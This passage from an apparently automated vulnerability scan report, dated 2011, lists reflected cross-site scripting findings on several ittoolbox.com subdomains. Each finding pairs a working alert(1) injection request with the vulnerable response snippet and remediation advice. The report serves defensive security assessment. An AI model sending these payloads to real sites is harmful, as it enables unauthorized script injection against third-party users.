GET /?61edb'-alert(1)-'896663fa1e4=1 HTTP/1.1 Host: peoplesoft.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71129 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=iym3pizr0gbuoc45o0n1tdbj; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:49 GMT Connection: close
3.109. http://projectmanagement.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://projectmanagement.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bde81'-alert(1)-'9af5a95404e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?bde81'-alert(1)-'9af5a95404e=1 HTTP/1.1 Host: projectmanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70526 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=srzbh0451zvt1aykxncvhz45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Project Man ...[SNIP]... && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fprojectmanagement.ittoolbox.com%2fDefault.aspx%3fbde81'-alert(1)-'9af5a95404e%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.110. http://projectmanagement.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://projectmanagement.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10b8f"style%3d"x%3aexpression(alert(1))"94a69cf8ec8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10b8f"style="x:expression(alert(1))"94a69cf8ec8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?10b8f"style%3d"x%3aexpression(alert(1))"94a69cf8ec8=1 HTTP/1.1 Host: projectmanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70641 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=s1g3rr45jcox1t55dq4cltjq; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Project Man ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://projectmanagement.ittoolbox.com/Default.aspx?10b8f"style="x:expression(alert(1))"94a69cf8ec8=1" /> ...[SNIP]...
3.111. http://sap.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://sap.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5c01"style%3d"x%3aexpression(alert(1))"faaf9b620ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5c01"style="x:expression(alert(1))"faaf9b620ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?a5c01"style%3d"x%3aexpression(alert(1))"faaf9b620ef=1 HTTP/1.1 Host: sap.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 83811 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=bdwb4luobk3iif45wvtitkjv; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> SAP Communi ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://sap.ittoolbox.com/Default.aspx?a5c01"style="x:expression(alert(1))"faaf9b620ef=1" /> ...[SNIP]...
3.112. http://sap.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://sap.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64f81'-alert(1)-'33dbbb56366 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?64f81'-alert(1)-'33dbbb56366=1 HTTP/1.1 Host: sap.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 83696 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=jcmkywvsla4hqv55tmvrz555; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> SAP Communi ...[SNIP]... ender != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fsap.ittoolbox.com%2fDefault.aspx%3f64f81'-alert(1)-'33dbbb56366%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.113. http://security.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://security.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67250'-alert(1)-'34814febd59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?67250'-alert(1)-'34814febd59=1 HTTP/1.1 Host: security.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 82066 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ae02ejrdk33rhrry3e05jd55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Security Co ...[SNIP]... != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fsecurity.ittoolbox.com%2fDefault.aspx%3f67250'-alert(1)-'34814febd59%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.114. http://security.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://security.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19004"style%3d"x%3aexpression(alert(1))"e443b525a7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19004"style="x:expression(alert(1))"e443b525a7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?19004"style%3d"x%3aexpression(alert(1))"e443b525a7a=1 HTTP/1.1 Host: security.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 82181 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=dfp1w3y02wvntw3hcmaoh455; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Security Co ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://security.ittoolbox.com/Default.aspx?19004"style="x:expression(alert(1))"e443b525a7a=1" /> ...[SNIP]...
3.115. http://siebel.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://siebel.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aea1c'-alert(1)-'e4c1cea88a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?aea1c'-alert(1)-'e4c1cea88a6=1 HTTP/1.1 Host: siebel.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72633 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=4pxfuha5qkzrox55243pqb3a; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Siebel Comm ...[SNIP]... er != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fsiebel.ittoolbox.com%2fDefault.aspx%3faea1c'-alert(1)-'e4c1cea88a6%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.116. http://siebel.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://siebel.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5748c"style%3d"x%3aexpression(alert(1))"896ccf64b9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5748c"style="x:expression(alert(1))"896ccf64b9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?5748c"style%3d"x%3aexpression(alert(1))"896ccf64b9b=1 HTTP/1.1 Host: siebel.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72746 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=nsjvz2bfl2vbqrjtqibnji45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Siebel Comm ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://siebel.ittoolbox.com/Default.aspx?5748c"style="x:expression(alert(1))"896ccf64b9b=1" /> ...[SNIP]...
3.117. http://storage.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://storage.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b153"style%3d"x%3aexpression(alert(1))"279e64ba5fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8b153"style="x:expression(alert(1))"279e64ba5fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?8b153"style%3d"x%3aexpression(alert(1))"279e64ba5fc=1 HTTP/1.1 Host: storage.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71962 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=uphrzt45c0z2rp45gq2ga32n; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Storage Com ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://storage.ittoolbox.com/Default.aspx?8b153"style="x:expression(alert(1))"279e64ba5fc=1" /> ...[SNIP]...
3.118. http://storage.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://storage.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0463'-alert(1)-'a06fbc40b91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?c0463'-alert(1)-'a06fbc40b91=1 HTTP/1.1 Host: storage.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71850 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=id0ajg55ttoi4r2xhbzjzi55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Storage Com ...[SNIP]... r != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fstorage.ittoolbox.com%2fDefault.aspx%3fc0463'-alert(1)-'a06fbc40b91%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.119. http://supplychain.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://supplychain.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3242"style%3d"x%3aexpression(alert(1))"d4a4cddf558 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3242"style="x:expression(alert(1))"d4a4cddf558 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?b3242"style%3d"x%3aexpression(alert(1))"d4a4cddf558=1 HTTP/1.1 Host: supplychain.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 75056 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=vmkl0r45zestph55yywxduu4; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:56 GMT Connection: close
3.120. http://supplychain.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://supplychain.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d17c7'-alert(1)-'6dcaf5eea3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?d17c7'-alert(1)-'6dcaf5eea3a=1 HTTP/1.1 Host: supplychain.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 74939 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=uhazjb3ghrjdbp45y0c4ad2g; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:59 GMT Connection: close
3.121. http://telephony.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://telephony.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 478ac"style%3d"x%3aexpression(alert(1))"e3abb888eab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 478ac"style="x:expression(alert(1))"e3abb888eab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?478ac"style%3d"x%3aexpression(alert(1))"e3abb888eab=1 HTTP/1.1 Host: telephony.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 62722 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=bzineuetfhf1b455njvyoj45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://telephony.ittoolbox.com/Default.aspx?478ac"style="x:expression(alert(1))"e3abb888eab=1" /> ...[SNIP]...
3.122. http://telephony.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://telephony.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ccc8'-alert(1)-'a149199ca41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?5ccc8'-alert(1)-'a149199ca41=1 HTTP/1.1 Host: telephony.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 62605 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ibj0x5yryxkgiy45p1u4yv55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2ftelephony.ittoolbox.com%2fDefault.aspx%3f5ccc8'-alert(1)-'a149199ca41%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.123. http://unix.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://unix.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fb9e'-alert(1)-'b7dda7dde6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?6fb9e'-alert(1)-'b7dda7dde6f=1 HTTP/1.1 Host: unix.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 80634 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=es4ozeq2t0whigrwvrxax545; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:13 GMT Connection: close
3.124. http://unix.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://unix.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e4e7"style%3d"x%3aexpression(alert(1))"28a7b7a768f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8e4e7"style="x:expression(alert(1))"28a7b7a768f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?8e4e7"style%3d"x%3aexpression(alert(1))"28a7b7a768f=1 HTTP/1.1 Host: unix.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 80749 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=dircxt45nurb15jv13tld2yb; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:10 GMT Connection: close
3.125. http://visualbasic.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://visualbasic.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d160d"style%3d"x%3aexpression(alert(1))"7853bc49d25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d160d"style="x:expression(alert(1))"7853bc49d25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?d160d"style%3d"x%3aexpression(alert(1))"7853bc49d25=1 HTTP/1.1 Host: visualbasic.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 64214 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=w3hcalnbh2ca1lq4t0b3k045; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Visual Basi ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://visualbasic.ittoolbox.com/Default.aspx?d160d"style="x:expression(alert(1))"7853bc49d25=1" /> ...[SNIP]...
3.126. http://visualbasic.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://visualbasic.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f46f'-alert(1)-'e6df936efc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
